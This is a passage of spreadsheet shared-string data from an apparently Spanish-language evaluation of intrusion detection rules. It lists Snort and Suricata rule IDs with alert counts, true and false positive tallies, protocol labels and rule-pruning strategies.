    <t>17677 (4), 7929858 (1)</t>
  </si>
  <si>
    <t>35662 (4)</t>
  </si>
  <si>
    <t>107347979 (4796)</t>
  </si>
  <si>
    <t>17533 (937)</t>
  </si>
  <si>
    <t>34050, 34039, 34040</t>
  </si>
  <si>
    <t>34050, 34041, 34039</t>
  </si>
  <si>
    <t>7929858 (2)</t>
  </si>
  <si>
    <t>107347979 (1)</t>
  </si>
  <si>
    <t>16103, 16074</t>
  </si>
  <si>
    <t>16195 (5), 16083 (1)</t>
  </si>
  <si>
    <t>16195, 16083</t>
  </si>
  <si>
    <t>107937798 (8)</t>
  </si>
  <si>
    <t>43604 (1)</t>
  </si>
  <si>
    <t>16214 (2), 17011 (2), 16250 (1), 32609 (1)</t>
  </si>
  <si>
    <t>16214, 17011, 16250, 32609</t>
  </si>
  <si>
    <t>33106 (16)</t>
  </si>
  <si>
    <t>29247 (2)</t>
  </si>
  <si>
    <t>16195, 17011, 16321, 34050</t>
  </si>
  <si>
    <t>107937798 (2)</t>
  </si>
  <si>
    <t>40169 (5)</t>
  </si>
  <si>
    <t>15893 (123)</t>
  </si>
  <si>
    <t>52166, 25853</t>
  </si>
  <si>
    <t>15895 (1)</t>
  </si>
  <si>
    <t>107937798 (129)</t>
  </si>
  <si>
    <t>12475 (152), 13900 (152), 29263 (1), 29264 (1)</t>
  </si>
  <si>
    <t>12648 (304), 29261 (1)</t>
  </si>
  <si>
    <t>45360 (17), 43814 (6), 110034945 (1)</t>
  </si>
  <si>
    <t>45360, 43814, 110034945</t>
  </si>
  <si>
    <t>29263 (1), 12475 (1), 29264 (1), 13900 (1)</t>
  </si>
  <si>
    <t>29263, 12475, 29264, 13900</t>
  </si>
  <si>
    <t>12648 (1), 29261 (1)</t>
  </si>
  <si>
    <t>16195, 34050, 17011, 16321</t>
  </si>
  <si>
    <t>10000501 (2)</t>
  </si>
  <si>
    <t>16195 (3), 16060 (2)</t>
  </si>
  <si>
    <t>34789 (1), 34795 (1)</t>
  </si>
  <si>
    <t>38783, 10000501</t>
  </si>
  <si>
    <t>107937798 (28)</t>
  </si>
  <si>
    <t>46002 (20)</t>
  </si>
  <si>
    <t>16195, 15895, 16321, 16270</t>
  </si>
  <si>
    <t>29511 (3)</t>
  </si>
  <si>
    <t>29511, 35640, 7929858, 8912906</t>
  </si>
  <si>
    <t>10328, 107937798, 107937801, 108658691, 110034945, 12525, 12766, 17714, 294191108, 43814, 44135, 45360, 47173, 48805</t>
  </si>
  <si>
    <t>30703, 43799</t>
  </si>
  <si>
    <t>12090, 33106, 35662, 45650</t>
  </si>
  <si>
    <t>17717, 32447, 40774, 42781, 43796, 43963</t>
  </si>
  <si>
    <t>10000483, 16035, 16983, 29081, 31989, 33759, 36591, 36817, 37359, 40169, 41474, 44504, 51546</t>
  </si>
  <si>
    <t>15832, 15839, 15893, 16864, 17458, 17459, 25360, 27210, 34038, 35799, 35944, 36660, 38924, 41540, 41542, 46289, 46478, 54381</t>
  </si>
  <si>
    <t>15511, 16178, 6</t>
  </si>
  <si>
    <t>11767, 15880, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16060, 16083, 16173, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17011, 17017, 17136, 17399, 24466, 24473, 25843, 26487, 26631, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32609, 33053, 33224, 33661, 33704, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35824, 38131, 38732, 40503, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 42899, 42966, 43349, 43355, 44114, 44467, 44611, 44623, 44624, 45302, 45416, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>Metasploit, Microsoft, RPC, SIPVicious</t>
  </si>
  <si>
    <t>Netis/Netcore</t>
  </si>
  <si>
    <t>ZeroAccess.Gen</t>
  </si>
  <si>
    <t>43.64%</t>
  </si>
  <si>
    <t>47.27%</t>
  </si>
  <si>
    <t>1, 3, 5, 12, 14, 15, 18, 19, 20, 28, 33, 42944</t>
  </si>
  <si>
    <t>37.27%</t>
  </si>
  <si>
    <t>59.09%</t>
  </si>
  <si>
    <t>2, 6, 22, 26, 34799</t>
  </si>
  <si>
    <t>368, 369, 372, 373, 381, 382, 385, 396, 399, 401, 404, 449, 566, 579, 613, 649, 650, 1010, 1136, 1280, 1413, 1447, 1546, 1616, 1735, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 31136, 42255, 42340</t>
  </si>
  <si>
    <t>Conservative Pruning (sin SIDs FP que no son SIDs TP, esto es, eliminar los SIDs que sólo aparecen en el tráfico legítimo) NOTA: Es independiente de los casos 500/1000 anteriores</t>
  </si>
  <si>
    <t>254, 366, 368, 369, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 449, 451, 453, 566, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1447, 1448, 1546, 1616, 1735, 1852, 1917, 2003, 2004, 2049, 2050, 2339, 2418, 2924, 11968, 27899, 28555, 28556, 28557, 29456, 31136, 41978, 42255, 42340, 42944</t>
  </si>
  <si>
    <t>16060 (1)</t>
  </si>
  <si>
    <t>41469 (1)</t>
  </si>
  <si>
    <t>53580 (1)</t>
  </si>
  <si>
    <t>15897 (1), 16265 (1)</t>
  </si>
  <si>
    <t>34039 (2), 16321 (2), 27457 (1), 44624 (1), 31834 (1)</t>
  </si>
  <si>
    <t>34039, 16321, 27457, 44624, 31834</t>
  </si>
  <si>
    <t>16206 (28), 16195 (17), 16060 (2)</t>
  </si>
  <si>
    <t>16083 (5), 34039 (1), 16060 (1)</t>
  </si>
  <si>
    <t>15896 (50), 17011 (2), 17017 (1)</t>
  </si>
  <si>
    <t>15896, 17011, 17017</t>
  </si>
  <si>
    <t>17011 (4), 31755 (2), 27457 (1), 44624 (1)</t>
  </si>
  <si>
    <t>17011, 31755, 27457, 44624</t>
  </si>
  <si>
    <t>27457 (1), 44624 (1), 31834 (1)</t>
  </si>
  <si>
    <t>27457, 44624, 31834</t>
  </si>
  <si>
    <t>18123 (1)</t>
  </si>
  <si>
    <t>15893 (157), 15862 (1)</t>
  </si>
  <si>
    <t>16267 (3), 16201 (3), 24466 (1), 16206 (1), 16195 (1), 16060 (1)</t>
  </si>
  <si>
    <t>16267, 16201, 24466, 16206, 16195, 16060</t>
  </si>
  <si>
    <t>34050 (908), 32609 (4), 17011 (2), 16321 (1)</t>
  </si>
  <si>
    <t>16206 (6), 15896 (2)</t>
  </si>
  <si>
    <t>16206, 15896</t>
  </si>
  <si>
    <t>24466 (1)</t>
  </si>
  <si>
    <t>16206 (30), 34039 (15), 17011 (2), 31755 (2)</t>
  </si>
  <si>
    <t>16206, 34039, 17011, 31755</t>
  </si>
  <si>
    <t>34039 (1), 15895 (1)</t>
  </si>
  <si>
    <t>34039 (1)</t>
  </si>
  <si>
    <t>15896 (5)</t>
  </si>
  <si>
    <t>17011 (4), 31755 (2), 16206 (1), 27457 (1), 44624 (1)</t>
  </si>
  <si>
    <t>17011, 31755, 16206, 27457, 44624</t>
  </si>
  <si>
    <t>27457 (1), 44624 (1), 16195 (1)</t>
  </si>
  <si>
    <t>27457, 44624, 16195</t>
  </si>
  <si>
    <t>17011 (2), 16321 (1)</t>
  </si>
  <si>
    <t>17011, 16321</t>
  </si>
  <si>
    <t>16195 (12), 16321 (8), 32609 (4), 16083 (4), 17011 (2), 28198 (1), 17017 (1)</t>
  </si>
  <si>
    <t>16195, 16321, 32609, 16083, 17011, 28198, 17017</t>
  </si>
  <si>
    <t>34039 (212), 16083 (3), 16321 (2)</t>
  </si>
  <si>
    <t>34039, 16083, 16321</t>
  </si>
  <si>
    <t>27457 (5), 44623 (5), 17017 (2)</t>
  </si>
  <si>
    <t>27457, 44623, 17017</t>
  </si>
  <si>
    <t>27457 (3), 44623 (3)</t>
  </si>
  <si>
    <t>27457, 44623</t>
  </si>
  <si>
    <t>34050 (3), 16083 (1)</t>
  </si>
  <si>
    <t>34050 (1)</t>
  </si>
  <si>
    <t>34050 (44)</t>
  </si>
  <si>
    <t>15893 (76)</t>
  </si>
  <si>
    <t>16195 (8), 32609 (5), 16083 (2), 17011 (2), 16321 (1), 16250 (1)</t>
  </si>
  <si>
    <t>16195, 32609, 16083, 17011, 16321, 16250</t>
  </si>
  <si>
    <t>15511 (3)</t>
  </si>
  <si>
    <t>17011 (4), 31755 (2), 16206 (1)</t>
  </si>
  <si>
    <t>17011, 31755, 16206</t>
  </si>
  <si>
    <t>16060 (1), 17011 (1), 16250 (1)</t>
  </si>
  <si>
    <t>16060, 17011, 16250</t>
  </si>
  <si>
    <t>34050 (115)</t>
  </si>
  <si>
    <t>16173 (28), 16265 (23), 15897 (19), 16270 (1), 27457 (1), 44624 (1), 59869 (1)</t>
  </si>
  <si>
    <t>16173, 16265, 15897, 16270, 27457, 44624, 59869</t>
  </si>
  <si>
    <t>27457 (22), 44611 (4), 15897 (1)</t>
  </si>
  <si>
    <t>27457, 44611, 15897</t>
  </si>
  <si>
    <t>15896 (1), 34040 (1)</t>
  </si>
  <si>
    <t>34050 (257)</t>
  </si>
  <si>
    <t>35766 (1)</t>
  </si>
  <si>
    <t>15921 (7), 39630 (1)</t>
  </si>
  <si>
    <t>16195 (91), 15895 (26), 16270 (6)</t>
  </si>
  <si>
    <t>16206 (3), 17017 (1), 31755 (1), 40469 (1), 16083 (1)</t>
  </si>
  <si>
    <t>16206, 17017, 31755, 40469, 16083</t>
  </si>
  <si>
    <t>16265 (1), 16195 (1)</t>
  </si>
  <si>
    <t>16265, 16195</t>
  </si>
  <si>
    <t>16083 (3), 31755 (2), 17017 (1), 28198 (1)</t>
  </si>
  <si>
    <t>16083, 31755, 17017, 28198</t>
  </si>
  <si>
    <t>16195 (4), 32609 (4), 17011 (2), 16321 (1)</t>
  </si>
  <si>
    <t>16195, 32609, 17011, 16321</t>
  </si>
  <si>
    <t>16206 (12)</t>
  </si>
  <si>
    <t>16206 (1), 16250 (1), 16321 (1)</t>
  </si>
  <si>
    <t>16206, 16250, 16321</t>
  </si>
  <si>
    <t>15893 (289008)</t>
  </si>
  <si>
    <t>34038 (119171), 15893 (41691)</t>
  </si>
  <si>
    <t>34039 (79622), 34050 (38449), 34041 (20020), 34552 (18715)</t>
  </si>
  <si>
    <t>16060 (5)</t>
  </si>
  <si>
    <t>15893 (300), 34038 (11)</t>
  </si>
  <si>
    <t>34039 (192), 16195 (40), 34040 (33), 40469 (12)</t>
  </si>
  <si>
    <t>34039, 16195, 34040, 40469</t>
  </si>
  <si>
    <t>15893 (4832), 34038 (4832)</t>
  </si>
  <si>
    <t>15893 (26830), 34038 (8952)</t>
  </si>
  <si>
    <t>34050 (8940), 34039 (7096), 34040 (1895)</t>
  </si>
  <si>
    <t>15893 (301787), 34038 (164789)</t>
  </si>
  <si>
    <t>34050 (109528), 34041 (27578), 34039 (27466)</t>
  </si>
  <si>
    <t>16103 (2), 16074 (2)</t>
  </si>
  <si>
    <t>16195 (61), 15895 (8), 16270 (2), 17011 (1)</t>
  </si>
  <si>
    <t>16195, 15895, 16270, 17011</t>
  </si>
  <si>
    <t>16250 (1), 16214 (1), 17136 (1)</t>
  </si>
  <si>
    <t>16250, 16214, 17136</t>
  </si>
  <si>
    <t>15511 (17)</t>
  </si>
  <si>
    <t>16195 (38), 16265 (16), 31755 (7), 17017 (3), 28198 (3), 32609 (2), 16321 (1), 16083 (1), 27457 (1), 44623 (1), 16270 (1)</t>
  </si>
  <si>
    <t>16195, 16265, 31755, 17017, 28198, 32609, 16321, 16083, 27457, 44623, 16270</t>
  </si>
  <si>
    <t>16104 (3), 27561 (3), 15893 (1)</t>
  </si>
  <si>
    <t>16104, 27561, 15893</t>
  </si>
  <si>
    <t>16195 (162), 17011 (2), 16321 (1), 34050 (1)</t>
  </si>
  <si>
    <t>16195 (4), 15895 (2)</t>
  </si>
  <si>
    <t>16195, 15895</t>
  </si>
  <si>
    <t>16195 (138), 34039 (123), 16321 (2), 17011 (2), 24466 (1)</t>
  </si>
  <si>
    <t>16195, 34039, 16321, 17011, 24466</t>
  </si>
  <si>
    <t>52166 (2), 25853 (1)</t>
  </si>
  <si>
    <t>17011 (4), 31755 (2), 16321 (1), 16206 (1), 27457 (1), 44624 (1)</t>
  </si>
  <si>
    <t>17011, 31755, 16321, 16206, 27457, 44624</t>
  </si>
  <si>
    <t>47013 (1)</t>
  </si>
  <si>
    <t>15893 (6950), 34038 (6950)</t>
  </si>
  <si>
    <t>16321 (1)</t>
  </si>
  <si>
    <t>16074 (7)</t>
  </si>
  <si>
    <t>15893 (19)</t>
  </si>
  <si>
    <t>16206 (5), 27457 (2), 44611 (2), 15895 (2), 16213 (1), 11767 (1), 16932 (1), 16265 (1), 16663 (1)</t>
  </si>
  <si>
    <t>16206, 27457, 44611, 15895, 16213, 11767, 16932, 16265, 16663</t>
  </si>
  <si>
    <t>15893 (171)</t>
  </si>
  <si>
    <t>15893 (260)</t>
  </si>
  <si>
    <t>15893 (4), 16104 (1), 27561 (1)</t>
  </si>
  <si>
    <t>15893, 16104, 27561</t>
  </si>
  <si>
    <t>16195 (51), 34050 (4), 17011 (2), 16321 (1)</t>
  </si>
  <si>
    <t>38783 (1), 10000501 (1)</t>
  </si>
  <si>
    <t>16195 (32), 16060 (1)</t>
  </si>
  <si>
    <t>16195 (88), 15895 (18), 16321 (1), 16270 (1)</t>
  </si>
  <si>
    <t>16173 (41), 28198 (2), 17011 (2), 31755 (2), 17017 (1), 16321 (1)</t>
  </si>
  <si>
    <t>16173, 28198, 17011, 31755, 17017, 16321</t>
  </si>
  <si>
    <t>16195 (71), 32609 (7), 16321 (4), 40469 (2), 16250 (1), 28198 (1), 17011 (1), 17017 (1), 16214 (1), 31755 (1), 16083 (1)</t>
  </si>
  <si>
    <t>16195, 32609, 16321, 40469, 16250, 28198, 17011, 17017, 16214, 31755, 16083</t>
  </si>
  <si>
    <t>34040 (6), 31755 (1), 28198 (1), 17017 (1), 16083 (1)</t>
  </si>
  <si>
    <t>34040, 31755, 28198, 17017, 16083</t>
  </si>
  <si>
    <t>16074 (100)</t>
  </si>
  <si>
    <t>soap</t>
  </si>
  <si>
    <t>portmapper</t>
  </si>
  <si>
    <t>active-directory-base, ldap</t>
  </si>
  <si>
    <t>ms-ds-smbv1</t>
  </si>
  <si>
    <t>ocsp</t>
  </si>
  <si>
    <t>ms-ds-smb-base, rtsp</t>
  </si>
  <si>
    <t>snmpv1-get-request</t>
  </si>
  <si>
    <t>apt-get, unknown-tcp</t>
  </si>
  <si>
    <t>gtp-u, gtpv1-c, incomplete, ssdp, unknown-udp</t>
  </si>
  <si>
    <t>snmpv1-get-request, snmpv2-get-request, upnp</t>
  </si>
  <si>
    <t>dns-base, ms-ds-smb-base, ms-ds-smbv1, portmapper</t>
  </si>
  <si>
    <t>sip, ssl</t>
  </si>
  <si>
    <t>#Flows FP</t>
  </si>
  <si>
    <t>#Flows TN</t>
  </si>
  <si>
    <t>#pcaps TP</t>
  </si>
  <si>
    <t>#pcaps FN</t>
  </si>
  <si>
    <t>#Flow-correlated Alerts TP</t>
  </si>
  <si>
    <t>#Flow-correlated Alerts FP</t>
  </si>
  <si>
    <t>#Flow-correlated Alerts</t>
  </si>
  <si>
    <t>"#Flow-correlated Alerts": Si un flujo dispara varias alertas con el mismo SID, sólo se cuenta una =&gt; "= Suma del número de SIDs diferentes que dispara cada flujo."</t>
  </si>
  <si>
    <t>pcaps</t>
  </si>
  <si>
    <t>Flows</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Pruning 500</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (sin SIDs con #Flow-correlated Alerts FP &gt; 500, aunque sean SIDs TP)</t>
    </r>
  </si>
  <si>
    <r>
      <t>Pruning 1000</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (sin SIDs con #Flow-correlated Alerts FP &gt; 1000, aunque sean SIDs TP)</t>
    </r>
  </si>
  <si>
    <t>#Attack flows</t>
  </si>
  <si>
    <t>#Clear flows</t>
  </si>
  <si>
    <t>#Total Flows</t>
  </si>
  <si>
    <t>"%Detection_pcaps": %Detection sobre Nº ataques/pcaps/procedimientos (NO de técnicas)</t>
  </si>
  <si>
    <t>2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2010939, 2011716, 2012709, 2012711, 2018124, 2019401, 2025649, 2025650, 2025992, 2100366, 2100368, 2101280, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 3, 5, 12, 14, 15, 18, 19, 20, 28, 33, 42944, 2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2010939, 2011716, 2012709, 2012711, 2018124, 2019401, 2025649, 2025650, 2025992, 2100366, 2100368, 2101280, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2011716, 2012709, 2012711, 2019401, 2025649, 2025650, 2025992, 2100366, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1, 3, 5, 12, 14, 15, 18, 19, 20, 28, 33, 42944, 2001219, 2001330, 2001972, 2008578, 2010935, 2010937, 2011716, 2012709, 2012711, 2019401, 2025649, 2025650, 2025992, 2100366, 2101411, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>#Flow-correlated Alerts (total)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFCC00CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Generalized Conservative Pruning </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(sin todos los SIDs FP AUNQUE también sean SIDs TP). NOTA: Es independiente de los casos anteriores (500, …)</t>
    </r>
  </si>
  <si>
    <t>Conservative Pruning (sin SIDs FP que no son SIDs TP, esto es, eliminar los SIDs que sólo aparecen en el tráfico legítimo, sólo FP) NOTA: Es independiente de los casos 500/1000 anteriores</t>
  </si>
  <si>
    <t>2006446 (29), 2017808 (12), 2010963 (10), 2017337 (6), 2011042 (5), 2002749 (4), 2016672 (4), 2011037 (2), 2020506 (1), 2009004 (1)</t>
  </si>
  <si>
    <t>2006446, 2017808, 2010963, 2017337, 2011042, 2002749, 2016672, 2011037, 2020506, 2009004</t>
  </si>
  <si>
    <t>2006446 (29), 2017808 (12), 2010963 (10), 2017337 (6), 2011042 (5), 2011037 (2), 2020506 (1), 2009004 (1)</t>
  </si>
  <si>
    <t>2006446, 2017808, 2010963, 2017337, 2011042, 2011037, 2020506, 2009004</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2053459 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2053459</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2013028 (2), 2034567 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2013028, 2034567, 2002824</t>
  </si>
  <si>
    <t>2012885 (74), 2008538 (72), 2053459 (18), 2006446 (15), 2053468 (15), 2053465 (14), 2053480 (4), 2002752 (2), 2002749 (2), 2053466 (2), 2006445 (1), 2017808 (1), 2049400 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2012885, 2008538, 2053459, 2006446, 2053468, 2053465, 2053480, 2002752, 2002749, 2053466, 2006445, 2017808, 2049400, 2009815, 2009714</t>
  </si>
  <si>
    <t>2012885 (74), 2053459 (18), 2006446 (15), 2053468 (15), 2053465 (14), 2053480 (4), 2053466 (2), 2006445 (1), 2017808 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2012885, 2053459, 2006446, 2053468, 2053465, 2053480, 2053466, 2006445, 2017808, 2009815, 2009714</t>
  </si>
  <si>
    <t>50447 (313915), 17429 (313426), 12 (21291), 41742 (3264), 1201 (408), 1213 (340), 882 (340), 895 (272), 1288 (204), 1826 (136), 1129 (136), 1071 (136), 1016 (136), 1141 (136), 59258 (136), 1852 (68), 1520 (68), 1521 (68), 835 (68), 849 (68), 896 (68), 853 (68), 43290 (68), 887 (68), 1434 (68), 1433 (68), 2062 (68), 43285 (68), 940 (68), 937 (68), 33608 (68), 1662 (68), 1489 (68), 1145 (68), 1301 (68), 879 (68), 1218 (68), 845 (68), 885 (68), 1206 (68), 1231 (68), 1668 (68), 1543 (68), 1551 (68), 839 (68), 825 (68), 1606 (68), 993 (68), 886 (68), 42289 (68), 1877 (68)</t>
  </si>
  <si>
    <t>12 (21291), 41742 (3264), 1201 (408), 1213 (340), 882 (340), 895 (272), 1288 (204), 1826 (136), 1129 (136), 1016 (136), 1141 (136), 1852 (68), 1520 (68), 1521 (68), 835 (68), 849 (68), 896 (68), 853 (68), 43290 (68), 887 (68), 2062 (68), 43285 (68), 940 (68), 937 (68), 33608 (68), 1662 (68), 1145 (68), 1301 (68), 879 (68), 1218 (68), 845 (68), 885 (68), 1206 (68), 1231 (68), 1543 (68), 1551 (68), 839 (68), 825 (68), 1606 (68), 886 (68), 42289 (68), 1877 (68)</t>
  </si>
  <si>
    <t>3 (2448485), 33 (2307494), 18 (2161957), 12 (1307665), 15 (724578), 20 (676014), 14 (113525), 19 (13594), 5 (7706), 42944 (6657), 1 (5984), 28 (1705), 8 (907), 22 (628), 2 (429), 41978 (328), 6 (153), 7 (138), 26 (118), 34799 (2), 31 (1), 4 (1)</t>
  </si>
  <si>
    <t>3, 33, 18, 12, 15, 20, 14, 19, 5, 42944, 1, 28, 8, 22, 2, 41978, 6, 7, 26, 34799, 31, 4</t>
  </si>
  <si>
    <t>2001330 (4156710), 2102466 (392240), 2102465 (377800), 2025992 (167303), 2025649 (167303), 2100366 (55345), 2001972 (51333), 2100372 (45362), 2012709 (17699), 2011716 (13756), 2008578 (12944), 2100368 (10825), 2010937 (5587), 2010935 (3620), 2016149 (3212), 2101411 (2430), 2025650 (2020), 2001219 (1963), 2102924 (1739), 2019401 (1732), 2012711 (1352), 2018124 (991), 2010939 (971), 2027390 (591), 2101280 (552), 2053892 (446), 2027757 (408), 2010936 (394), 2101616 (369), 2015856 (302), 2101413 (302), 2012710 (284), 2053893 (278), 2027413 (268), 2013479 (201), 2012712 (152), 2002911 (133), 2100566 (133), 2023640 (120), 2100373 (117), 2100369 (117), 2012296 (109), 2019102 (108), 2025822 (65), 2003068 (63), 2025275 (41), 2023753 (39), 2010938 (36), 2038967 (29), 2024297 (27), 2027412 (24), 2102003 (10), 2100579 (8), 2018585 (7), 2036252 (5), 2050281 (5), 2025712 (4), 2033078 (4), 2016778 (3), 2012252 (2), 2024217 (2), 2100537 (2), 2009099 (2), 2029575 (2), 2016683 (2), 2029340 (1), 2100538 (1), 2015023 (1), 2012647 (1), 2014380 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>2001330, 2102466, 2102465, 2025992, 2025649, 2100366, 2001972, 2100372, 2012709, 2011716, 2008578, 2100368, 2010937, 2010935, 2016149, 2101411, 2025650, 2001219, 2102924, 2019401, 2012711, 2018124, 2010939, 2027390, 2101280, 2053892, 2027757, 2010936, 2101616, 2015856, 2101413, 2012710, 2053893, 2027413, 2013479, 2012712, 2002911, 2100566, 2023640, 2100373, 2100369, 2012296, 2019102, 2025822, 2003068, 2025275, 2023753, 2010938, 2038967, 2024297, 2027412, 2102003, 2100579, 2018585, 2036252, 2050281, 2025712, 2033078, 2016778, 2012252, 2024217, 2100537, 2009099, 2029575, 2016683, 2029340, 2100538, 2015023, 2012647, 2014380, 2021195</t>
  </si>
  <si>
    <t>2001330 (4156710), 3 (2448485), 33 (2307494), 18 (2161957), 12 (1307665), 15 (724578), 20 (676014), 2102466 (392240), 2102465 (377800), 2025992 (167303), 2025649 (167303), 14 (113525), 2100366 (55345), 2001972 (51333), 2100372 (45362), 2012709 (17699), 2011716 (13756), 19 (13594), 2008578 (12944), 2100368 (10825), 5 (7706), 42944 (6657), 1 (5984), 2010937 (5587), 2010935 (3620), 2016149 (3212), 2101411 (2430), 2025650 (2020), 2001219 (1963), 2102924 (1739), 2019401 (1732), 28 (1705), 2012711 (1352), 2018124 (991), 2010939 (971), 8 (907), 22 (628), 2027390 (591), 2101280 (552), 2053892 (446), 2 (429), 2027757 (408), 2010936 (394), 2101616 (369), 41978 (328), 2015856 (302), 2101413 (302), 2012710 (284), 2053893 (278), 2027413 (268), 2013479 (201), 6 (153), 2012712 (152), 7 (138), 2002911 (133), 2100566 (133), 2023640 (120), 26 (118), 2100373 (117), 2100369 (117), 2012296 (109), 2019102 (108), 2025822 (65), 2003068 (63), 2025275 (41), 2023753 (39), 2010938 (36), 2038967 (29), 2024297 (27), 2027412 (24), 2102003 (10), 2100579 (8), 2018585 (7), 2036252 (5), 2050281 (5), 2025712 (4), 2033078 (4), 2016778 (3), 2012252 (2), 2024217 (2), 2100537 (2), 2009099 (2), 34799 (2), 2029575 (2), 2016683 (2), 2029340 (1), 31 (1), 2100538 (1), 2015023 (1), 4 (1), 2012647 (1), 2014380 (1), 2021195 (1)</t>
  </si>
  <si>
    <t>2001330, 3, 33, 18, 12, 15, 20, 2102466, 2102465, 2025992, 2025649, 14, 2100366, 2001972, 2100372, 2012709, 2011716, 19, 2008578, 2100368, 5, 42944, 1, 2010937, 2010935, 2016149, 2101411, 2025650, 2001219, 2102924, 2019401, 28, 2012711, 2018124, 2010939, 8, 22, 2027390, 2101280, 2053892, 2, 2027757, 2010936, 2101616, 41978, 2015856, 2101413, 2012710, 2053893, 2027413, 2013479, 6, 2012712, 7, 2002911, 2100566, 2023640, 26, 2100373, 2100369, 2012296, 2019102, 2025822, 2003068, 2025275, 2023753, 2010938, 2038967, 2024297, 2027412, 2102003, 2100579, 2018585, 2036252, 2050281, 2025712, 2033078, 2016778, 2012252, 2024217, 2100537, 2009099, 34799, 2029575, 2016683, 2029340, 31, 2100538, 2015023, 4, 2012647, 2014380, 2021195</t>
  </si>
  <si>
    <t>254 (2422493), 1448 (2158863), 3 (1540385), 33 (1446594), 18 (1411379), 12 (869488), 50447 (564756), 21232 (511807), 44487 (453316), 44485 (453316), 15 (449255), 20 (403609), 20212 (393629), 51127 (298171), 44484 (242275), 44486 (242104), 44488 (242102), 42340 (220914), 44489 (214697), 5730 (122607), 14 (78298), 384 (59118), 408 (59021), 29456 (58417), 31767 (54574), 43496 (51446), 57756 (43408), 366 (32973), 449 (26388), 29957 (19846), 372 (17353), 1917 (16887), 28993 (16284), 2924 (13465), 14019 (12318), 19 (8770), 5 (6844), 4060 (6701), 1 (6588), 368 (6579), 42944 (5069), 32481 (3858), 40186 (3170), 20528 (2777), 27938 (2679), 4 (2675), 35527 (1781), 15306 (1750), 50633 (1464), 1417 (1404), 59258 (1386), 1411 (1225), 28 (1154), 44455 (1131), 44416 (1102), 1394 (957), 11192 (872), 385 (820), 42017 (816), 16418 (816), 399 (778), 13974 (719), 8 (681), 39488 (664), 28069 (623), 29639 (601), 402 (593), 28556 (495), 46373 (461), 1280 (454), 2049 (431), 25664 (415), 18174 (363), 1201 (355), 57878 (335), 41978 (328), 22 (323), 16282 (315), 2 (267), 11968 (254), 43359 (250), 43362 (244), 42946 (215), 401 (198), 23861 (197), 1616 (196), 43755 (195), 43808 (182), 1413 (179), 382 (166), 37909 (165), 45578 (159), 44679 (143), 38038 (143), 3679 (142), 36650 (136), 29519 (135), 1010 (135), 48894 (126), 16301 (124), 48326 (113), 28557 (100), 7 (99), 12065 (89), 24304 (83), 44651 (83), 373 (79), 369 (79), 895 (78), 13913 (75), 17110 (70), 453 (68), 451 (68), 566 (67), 17152 (63), 6 (61), 37545 (55), 41742 (50), 882 (50), 45941 (45), 381 (38), 6699 (37), 42016 (36), 404 (35), 15850 (33), 2339 (28), 1418 (28), 1420 (26), 48134 (26), 5318 (26), 39320 (25), 12066 (25), 51000 (22), 31136 (20), 23493 (20), 51284 (19), 26 (18), 38381 (18), 16008 (16), 59597 (16), 49040 (14), 35193 (14), 38104 (13), 51333 (13), 30342 (13), 17494 (12), 48331 (11), 31399 (11), 15873 (10), 30490 (9), 18474 (9), 41077 (8), 41186 (8), 579 (8), 27899 (7), 21214 (7), 31341 (7), 2418 (7), 2003 (6), 2004 (6), 28555 (6), 4990 (6), 2050 (6), 65062 (5), 41063 (5), 42255 (4), 1421 (4), 15517 (4), 26989 (4), 35180 (3), 33561 (3), 12632 (3), 28321 (3), 28313 (3), 650 (3), 41075 (3), 41061 (3), 24096 (3), 16510 (3), 1735 (3), 16642 (3), 28039 (3), 18611 (3), 853 (2), 24303 (2), 1447 (2), 17458 (2), 41068 (2), 396 (2), 649 (2), 1136 (2), 34799 (2), 11263 (1), 23362 (1), 31 (1), 26317 (1), 29509 (1), 47082 (1), 41072 (1), 41066 (1), 51344 (1), 24889 (1), 41055 (1), 3822 (1), 20566 (1), 31212 (1), 41074 (1), 41065 (1), 41056 (1), 41057 (1), 41067 (1), 22097 (1), 41071 